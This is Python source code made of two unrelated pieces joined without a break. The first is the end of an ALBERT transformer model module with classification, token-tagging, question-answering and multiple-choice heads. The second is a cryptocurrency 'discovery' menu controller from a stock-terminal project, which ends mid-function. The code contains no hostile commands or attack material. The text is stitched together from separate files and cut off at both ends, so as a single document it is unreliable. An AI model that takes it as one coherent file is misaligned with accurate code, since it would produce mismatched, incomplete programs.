output_type=SequenceClassifierOutput, config_class=_CONFIG_FOR_DOC, ) def forward( self, input_ids=None, attention_mask=None, token_type_ids=None, position_ids=None, head_mask=None, inputs_embeds=None, labels=None, output_attentions=None, output_hidden_states=None, return_dict=None, ): r""" labels (:obj:`torch.LongTensor` of shape :obj:`(batch_size,)`, `optional`): Labels for computing the sequence classification/regression loss. Indices should be in ``[0, ..., config.num_labels - 1]``. If ``config.num_labels == 1`` a regression loss is computed (Mean-Square loss), If ``config.num_labels > 1`` a classification loss is computed (Cross-Entropy). """ return_dict = return_dict if return_dict is not None else self.config.use_return_dict outputs = self.albert( input_ids=input_ids, attention_mask=attention_mask, token_type_ids=token_type_ids, position_ids=position_ids, head_mask=head_mask, inputs_embeds=inputs_embeds, output_attentions=output_attentions, output_hidden_states=output_hidden_states, return_dict=return_dict, ) pooled_output = outputs[1] pooled_output = self.dropout(pooled_output) logits = self.classifier(pooled_output) loss = None if labels is not None: if self.config.problem_type is None: if self.num_labels == 1: self.config.problem_type = "regression" elif self.num_labels > 1 and (labels.dtype == torch.long or labels.dtype == torch.int): self.config.problem_type = "single_label_classification" else: self.config.problem_type = "multi_label_classification" if self.config.problem_type == "regression": loss_fct = MSELoss() if self.num_labels == 1: loss = loss_fct(logits.squeeze(), labels.squeeze()) else: loss = loss_fct(logits, labels) elif self.config.problem_type == "single_label_classification": loss_fct = CrossEntropyLoss() loss = loss_fct(logits.view(-1, self.num_labels), labels.view(-1)) elif self.config.problem_type == "multi_label_classification": loss_fct = BCEWithLogitsLoss() loss = loss_fct(logits, labels) if not return_dict: output = (logits,) + outputs[2:] return ((loss,) + output) if loss is not None else output return SequenceClassifierOutput( loss=loss, logits=logits, hidden_states=outputs.hidden_states, attentions=outputs.attentions, ) @add_start_docstrings( """ Albert Model with a token classification head on top (a linear layer on top of the hidden-states output) e.g. for Named-Entity-Recognition (NER) tasks. """, ALBERT_START_DOCSTRING, ) class AlbertForTokenClassification(AlbertPreTrainedModel): _keys_to_ignore_on_load_unexpected = [r"pooler"] def __init__(self, config): super().__init__(config) self.num_labels = config.num_labels self.albert = AlbertModel(config, add_pooling_layer=False) classifier_dropout_prob = ( config.classifier_dropout_prob if config.classifier_dropout_prob is not None else config.hidden_dropout_prob ) self.dropout = nn.Dropout(classifier_dropout_prob) self.classifier = nn.Linear(config.hidden_size, self.config.num_labels) # Initialize weights and apply final processing self.post_init() @add_start_docstrings_to_model_forward(ALBERT_INPUTS_DOCSTRING.format("batch_size, sequence_length")) @add_code_sample_docstrings( processor_class=_TOKENIZER_FOR_DOC, checkpoint=_CHECKPOINT_FOR_DOC, output_type=TokenClassifierOutput, config_class=_CONFIG_FOR_DOC, ) def forward( self, input_ids=None, attention_mask=None, token_type_ids=None, position_ids=None, head_mask=None, inputs_embeds=None, labels=None, output_attentions=None, output_hidden_states=None, return_dict=None, ): r""" labels (:obj:`torch.LongTensor` of shape :obj:`(batch_size, sequence_length)`, `optional`): Labels for computing the token classification loss. Indices should be in ``[0, ..., config.num_labels - 1]``. """ return_dict = return_dict if return_dict is not None else self.config.use_return_dict outputs = self.albert( input_ids, attention_mask=attention_mask, token_type_ids=token_type_ids, position_ids=position_ids, head_mask=head_mask, inputs_embeds=inputs_embeds, output_attentions=output_attentions, output_hidden_states=output_hidden_states, return_dict=return_dict, ) sequence_output = outputs[0] sequence_output = self.dropout(sequence_output) logits = self.classifier(sequence_output) loss = None if labels is not None: loss_fct = CrossEntropyLoss() # Only keep active parts of the loss if attention_mask is not None: active_loss = attention_mask.view(-1) == 1 active_logits = logits.view(-1, self.num_labels) active_labels = torch.where( active_loss, labels.view(-1), torch.tensor(loss_fct.ignore_index).type_as(labels) ) loss = loss_fct(active_logits, active_labels) else: loss = loss_fct(logits.view(-1, self.num_labels), labels.view(-1)) if not return_dict: output = (logits,) + outputs[2:] return ((loss,) + output) if loss is not None else output return TokenClassifierOutput( loss=loss, logits=logits, hidden_states=outputs.hidden_states, attentions=outputs.attentions, ) @add_start_docstrings( """ Albert Model with a span classification head on top for extractive question-answering tasks like SQuAD (a linear layers on top of the hidden-states output to compute `span start logits` and `span end logits`). """, ALBERT_START_DOCSTRING, ) class AlbertForQuestionAnswering(AlbertPreTrainedModel): _keys_to_ignore_on_load_unexpected = [r"pooler"] def __init__(self, config): super().__init__(config) self.num_labels = config.num_labels self.albert = AlbertModel(config, add_pooling_layer=False) self.qa_outputs = nn.Linear(config.hidden_size, config.num_labels) # Initialize weights and apply final processing self.post_init() @add_start_docstrings_to_model_forward(ALBERT_INPUTS_DOCSTRING.format("batch_size, sequence_length")) @add_code_sample_docstrings( processor_class=_TOKENIZER_FOR_DOC, checkpoint=_CHECKPOINT_FOR_DOC, output_type=QuestionAnsweringModelOutput, config_class=_CONFIG_FOR_DOC, ) def forward( self, input_ids=None, attention_mask=None, token_type_ids=None, position_ids=None, head_mask=None, inputs_embeds=None, start_positions=None, end_positions=None, output_attentions=None, output_hidden_states=None, return_dict=None, ): r""" start_positions (:obj:`torch.LongTensor` of shape :obj:`(batch_size,)`, `optional`): Labels for position (index) of the start of the labelled span for computing the token classification loss. Positions are clamped to the length of the sequence (:obj:`sequence_length`). Position outside of the sequence are not taken into account for computing the loss. end_positions (:obj:`torch.LongTensor` of shape :obj:`(batch_size,)`, `optional`): Labels for position (index) of the end of the labelled span for computing the token classification loss. Positions are clamped to the length of the sequence (:obj:`sequence_length`). Position outside of the sequence are not taken into account for computing the loss. """ return_dict = return_dict if return_dict is not None else self.config.use_return_dict outputs = self.albert( input_ids=input_ids, attention_mask=attention_mask, token_type_ids=token_type_ids, position_ids=position_ids, head_mask=head_mask, inputs_embeds=inputs_embeds, output_attentions=output_attentions, output_hidden_states=output_hidden_states, return_dict=return_dict, ) sequence_output = outputs[0] logits = self.qa_outputs(sequence_output) start_logits, end_logits = logits.split(1, dim=-1) start_logits = start_logits.squeeze(-1).contiguous() end_logits = end_logits.squeeze(-1).contiguous() total_loss = None if start_positions is not None and end_positions is not None: # If we are on multi-GPU, split add a dimension if len(start_positions.size()) > 1: start_positions = start_positions.squeeze(-1) if len(end_positions.size()) > 1: end_positions = end_positions.squeeze(-1) # sometimes the start/end positions are outside our model inputs, we ignore these terms ignored_index = start_logits.size(1) start_positions = start_positions.clamp(0, ignored_index) end_positions = end_positions.clamp(0, ignored_index) loss_fct = CrossEntropyLoss(ignore_index=ignored_index) start_loss = loss_fct(start_logits, start_positions) end_loss = loss_fct(end_logits, end_positions) total_loss = (start_loss + end_loss) / 2 if not return_dict: output = (start_logits, end_logits) + outputs[2:] return ((total_loss,) + output) if total_loss is not None else output return QuestionAnsweringModelOutput( loss=total_loss, start_logits=start_logits, end_logits=end_logits, hidden_states=outputs.hidden_states, attentions=outputs.attentions, ) @add_start_docstrings( """ Albert Model with a multiple choice classification head on top (a linear layer on top of the pooled output and a softmax) e.g. for RocStories/SWAG tasks. """, ALBERT_START_DOCSTRING, ) class AlbertForMultipleChoice(AlbertPreTrainedModel): def __init__(self, config): super().__init__(config) self.albert = AlbertModel(config) self.dropout = nn.Dropout(config.classifier_dropout_prob) self.classifier = nn.Linear(config.hidden_size, 1) # Initialize weights and apply final processing self.post_init() @add_start_docstrings_to_model_forward(ALBERT_INPUTS_DOCSTRING.format("batch_size, num_choices, sequence_length")) @add_code_sample_docstrings( processor_class=_TOKENIZER_FOR_DOC, checkpoint=_CHECKPOINT_FOR_DOC, output_type=MultipleChoiceModelOutput, config_class=_CONFIG_FOR_DOC, ) def forward( self, input_ids=None, attention_mask=None, token_type_ids=None, position_ids=None, head_mask=None, inputs_embeds=None, labels=None, output_attentions=None, output_hidden_states=None, return_dict=None, ): r""" labels (:obj:`torch.LongTensor` of shape :obj:`(batch_size,)`, `optional`): Labels for computing the multiple choice classification loss. Indices should be in ``[0, ..., num_choices-1]`` where `num_choices` is the size of the second dimension of the input tensors. (see `input_ids` above) """ return_dict = return_dict if return_dict is not None else self.config.use_return_dict num_choices = input_ids.shape[1] if input_ids is not None else inputs_embeds.shape[1] input_ids = input_ids.view(-1, input_ids.size(-1)) if input_ids is not None else None attention_mask = attention_mask.view(-1, attention_mask.size(-1)) if attention_mask is not None else None token_type_ids = token_type_ids.view(-1, token_type_ids.size(-1)) if token_type_ids is not None else None position_ids = position_ids.view(-1, position_ids.size(-1)) if position_ids is not None else None inputs_embeds = ( inputs_embeds.view(-1, inputs_embeds.size(-2), inputs_embeds.size(-1)) if inputs_embeds is not None else None ) outputs = self.albert( input_ids, attention_mask=attention_mask, token_type_ids=token_type_ids, position_ids=position_ids, head_mask=head_mask, inputs_embeds=inputs_embeds, output_attentions=output_attentions, output_hidden_states=output_hidden_states, return_dict=return_dict, ) pooled_output = outputs[1] pooled_output = self.dropout(pooled_output) logits = self.classifier(pooled_output) reshaped_logits = logits.view(-1, num_choices) loss = None if labels is not None: loss_fct = CrossEntropyLoss() loss = loss_fct(reshaped_logits, labels) if not return_dict: output = (reshaped_logits,) + outputs[2:] return ((loss,) + output) if loss is not None else output return MultipleChoiceModelOutput( loss=loss, logits=reshaped_logits, hidden_states=outputs.hidden_states, attentions=outputs.attentions, )
"""Cryptocurrency Discovery Controller""" __docformat__ = "numpy" # pylint: disable=R0904, C0302, W0622, C0201 import argparse import difflib from typing import List, Union from prompt_toolkit.completion import NestedCompleter from gamestonk_terminal import feature_flags as gtff from gamestonk_terminal.helper_funcs import ( EXPORT_ONLY_RAW_DATA_ALLOWED, get_flair, parse_known_args_and_warn, check_positive, try_except, system_clear, ) from gamestonk_terminal.menu import session from gamestonk_terminal.cryptocurrency.discovery import ( coinmarketcap_model, coinpaprika_model, pycoingecko_model, pycoingecko_view, coinpaprika_view, coinmarketcap_view, ) from gamestonk_terminal.cryptocurrency.crypto_controller import CRYPTO_SOURCES from gamestonk_terminal.cryptocurrency import cryptocurrency_helpers class DiscoveryController: """Discovery Controller class""" CHOICES = [ "cls", "home", "h", "?", "help", "q", "quit", "..", "exit", "r", "reset", ] CHOICES_COMMANDS = [ "coins", "cpsearch", "cmctop", "cgtrending", "cgvoted", "cgvisited", "cgvolume", "cgrecently", "cgsentiment", "cggainers", "cglosers", "cgyfarms", "cgdefi", "cgdex", "cgnft", ] CHOICES += CHOICES_COMMANDS def __init__(self, queue: List[str] = None): """CONSTRUCTOR""" self.discovery_parser = argparse.ArgumentParser(add_help=False, prog="disc") self.discovery_parser.add_argument("cmd", choices=self.CHOICES) self.completer: Union[None, NestedCompleter] = None if session and gtff.USE_PROMPT_TOOLKIT: choices: dict = {c: {} for c in self.CHOICES} choices["coins"]["--source"] = {c: {} for c in CRYPTO_SOURCES.keys()} choices["cggainers"]["-p"] = { c: {} for c in pycoingecko_model.PERIODS.keys() } choices["cggainers"]["-s"] = { c: {} for c in pycoingecko_model.GAINERS_FILTERS } choices["cglosers"]["-p"] = { c: {} for c in pycoingecko_model.PERIODS.keys() } choices["cglosers"]["-s"] = { c: {} for c in pycoingecko_model.GAINERS_FILTERS } choices["cgtrending"]["-s"] = { c: {} for c in pycoingecko_model.TRENDING_FILTERS } choices["cgvoted"]["-s"] = { c: {} for c in pycoingecko_model.TRENDING_FILTERS } choices["cgvisited"]["-s"] = { c: {} for c in pycoingecko_model.TRENDING_FILTERS } choices["cgsentiment"]["-s"] = { c: {} for c in pycoingecko_model.TRENDING_FILTERS } choices["cgrecently"]["-s"] = { c: {} for c in pycoingecko_model.RECENTLY_FILTERS } choices["cgyfarms"]["-s"] = { c: {} for c in pycoingecko_model.YFARMS_FILTERS } choices["cgvolume"]["-s"] = {c: {} for c in pycoingecko_model.CAP_FILTERS} choices["cgdefi"]["-s"] = {c: {} for c in pycoingecko_model.CAP_FILTERS} choices["cgnft"]["-s"] = {c: {} for c in pycoingecko_model.CAP_FILTERS} choices["cgdex"]["-s"] = {c: {} for c in pycoingecko_model.DEX_FILTERS} choices["cmctop"]["-s"] = {c: {} for c in coinmarketcap_model.FILTERS} choices["cpsearch"]["-s"] = {c: {} for c in coinpaprika_model.FILTERS} choices["cpsearch"]["-c"] = {c: {} for c in coinpaprika_model.CATEGORIES} self.completer = NestedCompleter.from_nested_dict(choices) if queue: self.queue = queue else: self.queue = list() def print_help(self): """Print help""" help_text = """ Discovery Menu: Overview: coins search for coins on CoinGecko, Binance, CoinPaprika CoinGecko: cgtrending trending coins on CoinGecko cgvoted most voted coins on CoinGecko cgvisited most visited coins on CoinGecko cgvolume coins with highest volume on CoinGecko cgrecently recently added on CoinGecko cgsentiment coins with most positive sentiment cggainers top gainers - coins which price gained the most in given period cglosers top losers - coins which price dropped the most in given period cgyfarms top yield farms cgdefi top defi protocols cgdex top decentralized exchanges cgnft top non fungible tokens CoinPaprika: cpsearch search on CoinPaprika CoinMarketCap: cmctop top coins from CoinMarketCap """ print(help_text) def switch(self, an_input: str): """Process and dispatch input Parameters ------- an_input : str string with input arguments Returns ------- List[str] List of commands in the queue to execute """ # Empty command if not an_input: print("") return self.queue # Navigation slash is being used if "/" in an_input: actions = an_input.split("/") # Absolute path is specified if not actions[0]: an_input = "home" # Relative path so execute first instruction else: an_input = actions[0] # Add all instructions to the queue for cmd in actions[1:][::-1]: if cmd: self.queue.insert(0, cmd) (known_args, other_args) = self.discovery_parser.parse_known_args( an_input.split() ) # Redirect commands to their correct functions if known_args.cmd: if known_args.cmd in ("..", "q"): known_args.cmd = "quit" elif known_args.cmd in ("?", "h"): known_args.cmd = "help" elif known_args.cmd == "r": known_args.cmd = "reset" getattr( self, "call_" + known_args.cmd, lambda _: "Command not recognized!", )(other_args) return self.queue def call_cls(self, _): """Process cls command""" system_clear() def call_home(self, _): """Process home command""" self.queue.insert(0, "quit") self.queue.insert(0, "quit") def call_help(self, _): """Process help command""" self.print_help() def call_quit(self, _): """Process quit menu command""" print("") self.queue.insert(0, "quit") def call_exit(self, _): """Process exit terminal command""" self.queue.insert(0, "quit") self.queue.insert(0, "quit") self.queue.insert(0, "quit") def call_reset(self, _): """Process reset command""" self.queue.insert(0, "disc") self.queue.insert(0, "crypto") self.queue.insert(0, "reset") self.queue.insert(0, "quit") self.queue.insert(0, "quit") @try_except def call_coins(self, other_args): """Process coins command""" parser = argparse.ArgumentParser( prog="coins", add_help=False, formatter_class=argparse.ArgumentDefaultsHelpFormatter, description="""Shows list of coins available on CoinGecko, CoinPaprika and Binance.If you provide name of coin then in result you will see ids of coins with best match for all mentioned services. If you provide ALL keyword in your search query, then all coins will be displayed. To move over coins you can use pagination mechanism with skip, top params. E.g. coins ALL --skip 100 --limit 30 then all coins from 100 to 130 will be displayed. By default skip = 0, limit = 10. If you won't provide source of the data everything will be displayed (CoinGecko, CoinPaprika, Binance). If you want to search only in given source then use --source flag. E.g. if you want to find coin with name uniswap on CoinPaprika then use: coins uniswap --source cp --limit 10 """, ) parser.add_argument( "-c", "--coin", help="Coin you search for", dest="coin", required="-h" not in other_args, type=str, ) parser.add_argument( "-s", "--skip", default=0, dest="skip", help="Skip n of records", type=check_positive, ) parser.add_argument( "-l", "--limit", default=10, dest="limit", help="Limit of records", type=check_positive, ) parser.add_argument( "--source", dest="source", help="Source of data.", type=str, choices=CRYPTO_SOURCES.keys(), ) if other_args: if not other_args[0][0] == "-": other_args.insert(0, "-c") ns_parser = parse_known_args_and_warn( parser, other_args, EXPORT_ONLY_RAW_DATA_ALLOWED ) if ns_parser: cryptocurrency_helpers.display_all_coins( coin=ns_parser.coin, source=ns_parser.source, top=ns_parser.limit, skip=ns_parser.skip, show_all=bool("ALL" in other_args), export=ns_parser.export, ) @try_except def call_cggainers(self, other_args): """Process gainers command""" parser = argparse.ArgumentParser( prog="cggainers", add_help=False, formatter_class=argparse.ArgumentDefaultsHelpFormatter, description=""" Shows Largest Gainers - coins which gain the most in given period. You can use parameter --period to set which timeframe are you interested in: 1h, 24h, 7d, 14d, 30d, 60d, 1y You can look on only N number of records with --limit, You can sort by Rank, Symbol, Name, Volume, Price, Change with --sort and also with --descend flag to set it to sort descending. There is --urls flag, which will display one additional column you all urls for coins. """, ) parser.add_argument( "-p", "--period", dest="period", type=str, help="time period, one from [1h, 24h, 7d, 14d, 30d, 60d, 1y]", default="1h", choices=pycoingecko_model.PERIODS.keys(), ) parser.add_argument( "-l", "--limit", dest="limit", type=check_positive, help="Number of records to display", default=15, ) parser.add_argument( "-s", "--sort", dest="sortby", type=str, help="Sort by given column. Default: Rank", default="Rank", choices=pycoingecko_model.GAINERS_FILTERS, ) parser.add_argument( "--descend", action="store_false", help="Flag to sort in descending order (lowest first)", dest="descend", default=True, ) parser.add_argument( "-u", "--urls", dest="urls", action="store_true", help="Flag to show urls. If you will use that flag you will additional column with urls", default=False, ) ns_parser = parse_known_args_and_warn( parser, other_args, EXPORT_ONLY_RAW_DATA_ALLOWED ) if ns_parser: pycoingecko_view.display_gainers( period=ns_parser.period, top=ns_parser.limit, sortby=ns_parser.sortby, descend=ns_parser.descend, links=ns_parser.urls, export=ns_parser.export, ) @try_except def call_cglosers(self, other_args): """Process losers command""" parser = argparse.ArgumentParser( prog="cglosers", add_help=False, formatter_class=argparse.ArgumentDefaultsHelpFormatter, description=""" Shows Largest Losers - coins which price dropped the most in given period You can use parameter --period to set which timeframe are you interested in: 1h, 24h, 7d, 14d, 30d, 60d, 1y You can look on only N number of records with --limit, You can sort by Rank, Symbol, Name, Volume, Price, Change with --sort and also with --descend flag to sort descending. Flag --urls will display one additional column with all coingecko urls for listed coins. """, ) parser.add_argument( "-p", "--period", dest="period", type=str, help="time period, one from [1h, 24h, 7d, 14d, 30d, 60d, 1y]", default="1h", choices=pycoingecko_model.PERIODS.keys(), ) parser.add_argument( "-l", "--limit", dest="limit", type=check_positive, help="Number of records to display", default=15, ) parser.add_argument( "-s", "--sort", dest="sortby", type=str, help="Sort by given column. Default: Rank", default="Rank", choices=pycoingecko_model.GAINERS_FILTERS, ) parser.add_argument( "--descend", action="store_false", help="Flag to sort in descending order (lowest first)", dest="descend", default=True, ) parser.add_argument( "-u", "--urls", dest="urls", action="store_true", help="Flag to show urls. If you will use that flag you will additional column with urls", default=False, ) ns_parser = parse_known_args_and_warn( parser, other_args, EXPORT_ONLY_RAW_DATA_ALLOWED ) if ns_parser: pycoingecko_view.display_losers( period=ns_parser.period, top=ns_parser.limit, sortby=ns_parser.sortby, descend=ns_parser.descend, links=ns_parser.urls, export=ns_parser.export, ) @try_except def call_cgtrending(self, other_args): """Process trending command""" parser = argparse.ArgumentParser( prog="cgtrending", add_help=False, formatter_class=argparse.ArgumentDefaultsHelpFormatter, description="""Discover trending coins. Use --limit parameter to display only N number of records, You can sort by Rank, Name, Price_BTC, Price_USD, using --sort parameter and also with --descend flag to sort descending. Flag --urls will display one additional column with all coingecko urls for listed coins. trending will display: Rank, Name, Price_BTC, Price_USD """, ) parser.add_argument( "-l", "--limit", dest="limit", type=check_positive, help="Number of records to display", default=15, ) parser.add_argument( "-s", "--sort", dest="sortby", type=str, help="Sort by given column. Default: rank", default="Rank", choices=pycoingecko_model.TRENDING_FILTERS, ) parser.add_argument( "--descend", action="store_false", help="Flag to sort in descending order (lowest first)", dest="descend", default=True, ) parser.add_argument( "-u", "--urls", dest="urls", action="store_true", help="Flag to show urls. If you will use that flag you will additional column with urls", default=False, ) ns_parser = parse_known_args_and_warn( parser, other_args, EXPORT_ONLY_RAW_DATA_ALLOWED ) if ns_parser: pycoingecko_view.display_discover( category="trending", top=ns_parser.limit, sortby=ns_parser.sortby, descend=ns_parser.descend, links=ns_parser.urls, export=ns_parser.export, ) @try_except def call_cgvoted(self, other_args): """Process voted command""" parser = argparse.ArgumentParser( prog="cgvoted", add_help=False, formatter_class=argparse.ArgumentDefaultsHelpFormatter, description="""Discover most voted coins. Use --limit parameter to display only N number of records, You can sort by Rank, Name, Price_BTC, Price_USD, using --sort parameter and also with --descend flag to sort descending. Flag --urls will display one additional column with all coingecko urls for listed coins. voted will display: Rank, Name, Price_BTC, Price_USD """, ) parser.add_argument( "-l", "--limit", dest="limit", type=check_positive, help="Number of records to display", default=15, ) parser.add_argument( "-s", "--sort", dest="sortby", type=str, help="Sort by given column. Default: rank", default="Rank", choices=pycoingecko_model.TRENDING_FILTERS, ) parser.add_argument( "--descend", action="store_false", help="Flag to sort in descending order (lowest first)", dest="descend", default=True, ) parser.add_argument( "-u", "--urls", dest="urls", action="store_true", help="Flag to show urls. If you will use that flag you will additional column with urls", default=False, ) ns_parser = parse_known_args_and_warn( parser, other_args, EXPORT_ONLY_RAW_DATA_ALLOWED ) if ns_parser: pycoingecko_view.display_discover( category="most_voted", top=ns_parser.limit, sortby=ns_parser.sortby, descend=ns_parser.descend, links=ns_parser.urls, export=ns_parser.export, ) @try_except def call_cgrecently(self, other_args): """Process recently command""" parser = argparse.ArgumentParser( prog="cgrecently", add_help=False, formatter_class=argparse.ArgumentDefaultsHelpFormatter, description=""" Shows recently added coins on CoinGecko. You can display only N number of coins with --limit parameter. You can sort data by Rank, Name, Symbol, Price, Change_1h, Change_24h, Added with --sort and also with --descend flag to sort descending. Flag --urls will display urls""", ) parser.add_argument( "-l", "--limit", dest="limit", type=check_positive, help="Number of records to display", default=15, ) parser.add_argument( "-s", "--sort", dest="sortby", type=str, help="Sort by given column. Default: Rank", default="Rank", choices=pycoingecko_model.RECENTLY_FILTERS, ) parser.add_argument( "--descend", action="store_false", help="Flag to sort in descending order (lowest first)", dest="descend", default=True, ) parser.add_argument( "-u", "--urls", dest="urls", action="store_true", help="Flag to show urls", default=False, ) ns_parser = parse_known_args_and_warn( parser, other_args, EXPORT_ONLY_RAW_DATA_ALLOWED ) if ns_parser: pycoingecko_view.display_recently_added( top=ns_parser.limit, sortby=ns_parser.sortby, descend=ns_parser.descend, links=ns_parser.urls, export=ns_parser.export, ) @try_except def call_cgvisited(self, other_args): """Process most_visited command""" parser = argparse.ArgumentParser( prog="cgvisited", add_help=False, formatter_class=argparse.ArgumentDefaultsHelpFormatter, description=""" Discover most visited coins. Use --limit parameter to display only N number of records, You can sort by Rank, Name, Price_BTC, Price_USD, using --sort parameter and also with --descend flag to sort descending. Flag --urls will display one additional column with all coingecko urls for listed coins. visited will display: Rank, Name, Price_BTC, Price_USD """, ) parser.add_argument( "-l", "--limit", dest="limit", type=check_positive, help="Number of records to display", default=15, ) parser.add_argument( "-s", "--sort", dest="sortby", type=str, help="Sort by given column. Default: rank", default="Rank", choices=pycoingecko_model.TRENDING_FILTERS, ) parser.add_argument( "--descend", action="store_false", help="Flag to sort in descending order (lowest first)", dest="descend", default=True, ) parser.add_argument( "-u", "--urls", dest="urls", action="store_true", help="Flag to show urls. If you will use that flag you will additional column with urls", default=False, ) ns_parser = parse_known_args_and_warn( parser, other_args, EXPORT_ONLY_RAW_DATA_ALLOWED ) if ns_parser: pycoingecko_view.display_discover( category="most_visited", top=ns_parser.limit, sortby=ns_parser.sortby, descend=ns_parser.descend, links=ns_parser.urls, export=ns_parser.export, ) @try_except def call_cgsentiment(self, other_args): """Process sentiment command""" parser = argparse.ArgumentParser( prog="cgsentiment", add_help=False, formatter_class=argparse.ArgumentDefaultsHelpFormatter, description=""" Discover coins with positive sentiment. Use --limit parameter to display only N number of records, You can sort by Rank, Name, Price_BTC, Price_USD, using --sort parameter and also with --descend flag to sort descending. Flag --urls will display one additional column with all coingecko urls for listed coins. sentiment will display: Rank, Name, Price_BTC, Price_USD """, ) parser.add_argument( "-l", "--limit", dest="limit", type=check_positive, help="Number of records to display", default=15, ) parser.add_argument( "-s", "--sort", dest="sortby", type=str, help="Sort by given column. Default: rank", default="Rank", choices=pycoingecko_model.TRENDING_FILTERS, ) parser.add_argument( "--descend", action="store_false", help="Flag to sort in descending order (lowest first)", dest="descend", default=True, ) parser.add_argument( "-u", "--urls", dest="urls", action="store_true", help="Flag to show urls. If you will use that flag you will additional column with urls", default=False, ) ns_parser = parse_known_args_and_warn( parser, other_args, EXPORT_ONLY_RAW_DATA_ALLOWED ) if ns_parser: pycoingecko_view.display_discover( category="positive_sentiment", top=ns_parser.limit, sortby=ns_parser.sortby, descend=ns_parser.descend, links=ns_parser.urls, export=ns_parser.export, ) @try_except def call_cgyfarms(self, other_args): """Process yfarms command""" parser = argparse.ArgumentParser( prog="cgyfarms", add_help=False, formatter_class=argparse.ArgumentDefaultsHelpFormatter, description=""" Shows Top Yield Farming Pools by Value Locked. Yield farming, also referred to as liquidity mining, is a way to generate rewards with cryptocurrency holdings. In simple terms, it means locking up cryptocurrencies and getting rewards. You can display only N number of coins with --limit parameter. You can sort data by Rank, Name, Value_Locked, Return_Year with --sort parameter and also with --descend flag to sort descending. """, ) parser.add_argument( "-l", "--limit", dest="limit", type=check_positive, help="Number of records to display", default=15, ) parser.add_argument( "-s", "--sort", dest="sortby", type=str, help="Sort by given column. Default: Rank", default="Rank", choices=pycoingecko_model.YFARMS_FILTERS, ) parser.add_argument( "--descend", action="store_false", help="Flag to sort in descending order (lowest first)", dest="descend", default=True, ) ns_parser = parse_known_args_and_warn( parser, other_args, EXPORT_ONLY_RAW_DATA_ALLOWED ) if ns_parser: pycoingecko_view.display_yieldfarms( top=ns_parser.limit, sortby=ns_parser.sortby, descend=ns_parser.descend, export=ns_parser.export, ) @try_except def call_cgvolume(self, other_args): """Process volume command""" parser = argparse.ArgumentParser( prog="cgvolume", add_help=False, formatter_class=argparse.ArgumentDefaultsHelpFormatter, description="""Shows Top Coins by Trading Volume. You can display only N number of coins with --limit parameter. You can sort data by on of columns Rank, Name, Symbol, Price, Change_1h, Change_24h, Change_7d, Volume_24h, Market_Cap with --sort parameter and also with --descend flag to sort descending. Displays columns: Rank, Name, Symbol, Price, Change_1h, Change_24h, Change_7d, Volume_24h, Market_Cap""", ) parser.add_argument( "-l", "--limit", dest="limit", type=check_positive, help="Number of records to display", default=15, ) parser.add_argument( "-s", "--sort", dest="sortby", type=str, help="Sort by given column. Default: Rank", default="Rank", choices=pycoingecko_model.CAP_FILTERS, ) parser.add_argument( "--descend", action="store_false", help="Flag to sort in descending order (lowest first)", dest="descend", default=True, ) ns_parser = parse_known_args_and_warn( parser, other_args, EXPORT_ONLY_RAW_DATA_ALLOWED ) if ns_parser: pycoingecko_view.display_top_volume_coins( top=ns_parser.limit, sortby=ns_parser.sortby, descend=ns_parser.descend, export=ns_parser.export, ) @try_except def call_cgdefi(self, other_args): """Process defi command""" parser = argparse.ArgumentParser( prog="cgdefi", add_help=False, formatter_class=argparse.ArgumentDefaultsHelpFormatter, description="""Shows Top DeFi Coins by Market Capitalization DeFi or Decentralized Finance refers to financial services that are built on top of distributed networks with no central intermediaries. You can display only N number of coins with --limit parameter. You can sort data by Rank, Name, Symbol, Price, Change_1h, Change_24h, Change_7d, Volume 24h, Market Cap, Url with --sort and also with --descend flag to sort descending. Flag --urls will display urls""", ) parser.add_argument( "-l", "--limit", dest="limit", type=check_positive, help="Number of records to display", default=15, ) parser.add_argument( "-s", "--sort", dest="sortby", type=str, help="Sort by given column. Default: rank", default="Rank", choices=pycoingecko_model.CAP_FILTERS, ) parser.add_argument( "--descend", action="store_false", help="Flag to sort in descending order (lowest first)", dest="descend", default=True, ) parser.add_argument( "-u", "--urls", dest="urls", action="store_true", help="Flag to show urls", default=False, ) ns_parser = parse_known_args_and_warn( parser, other_args, EXPORT_ONLY_RAW_DATA_ALLOWED ) if ns_parser: pycoingecko_view.display_top_defi_coins( top=ns_parser.limit, sortby=ns_parser.sortby, descend=ns_parser.descend, links=ns_parser.urls, export=ns_parser.export, ) @try_except def call_cgdex(self, other_args): """Process dex command""" parser = argparse.ArgumentParser( prog="cgdex", add_help=False, formatter_class=argparse.ArgumentDefaultsHelpFormatter, description=""" Shows Top Decentralized Exchanges on CoinGecko by Trading Volume You can display only N number of coins with --limit parameter. You can sort data by Name, Rank, Volume_24h, Coins, Pairs, Visits, Most_Traded, Market_Share by volume with --sort and also with --descend flag to sort descending. Display columns: Name, Rank, Volume_24h, Coins, Pairs, Visits, Most_Traded, Market_Share""", ) parser.add_argument( "-l", "--limit", dest="limit", type=check_positive, help="Number of records to display", default=15, ) parser.add_argument( "-s", "--sort", dest="sortby", type=str, help="Sort by given column. Default: Rank", default="Rank", choices=pycoingecko_model.DEX_FILTERS, ) parser.add_argument( "--descend", action="store_false", help="Flag to sort in descending order (lowest first)", dest="descend", default=True, ) ns_parser = parse_known_args_and_warn( parser, other_args, EXPORT_ONLY_RAW_DATA_ALLOWED ) if ns_parser: pycoingecko_view.display_top_dex( top=ns_parser.limit, sortby=ns_parser.sortby, descend=ns_parser.descend, export=ns_parser.export, ) @try_except def call_cgnft(self, other_args): """Process nft command""" parser = argparse.ArgumentParser( prog="cgnft", add_help=False, formatter_class=argparse.ArgumentDefaultsHelpFormatter, description="""Shows Top NFT Coins by Market Capitalization NFT (Non-fungible Token) refers to digital assets with unique characteristics. Examples of NFT include crypto artwork, collectibles, game items, financial products, and more. You can display only N number of coins with --limit parameter. You can sort data by Rank, Name, Symbol, Price, Change_1d, Change_24h, Change_7d, Market_Cap with --sort and also with --descend flag to sort descending. Flag --urls will display urls Displays : Rank, Name, Symbol, Price, Change_1d, Change_24h, Change_7d, Market_Cap, Url""", ) parser.add_argument( "-l", "--limit", dest="limit", type=check_positive, help="Number of records to display", default=15, ) parser.add_argument( "-s", "--sort", dest="sortby", type=str, help="Sort by given column. Default: Rank", default="Rank", choices=pycoingecko_model.CAP_FILTERS, ) parser.add_argument( "--descend", action="store_false", help="Flag to sort in descending order (lowest first)", dest="descend", default=True, ) parser.add_argument( "-u", "--urls", dest="urls", action="store_true", help="Flag to show urls", default=False, ) ns_parser = parse_known_args_and_warn( parser, other_args, EXPORT_ONLY_RAW_DATA_ALLOWED ) if ns_parser: pycoingecko_view.display_top_nft( top=ns_parser.limit, sortby=ns_parser.sortby, descend=ns_parser.descend, 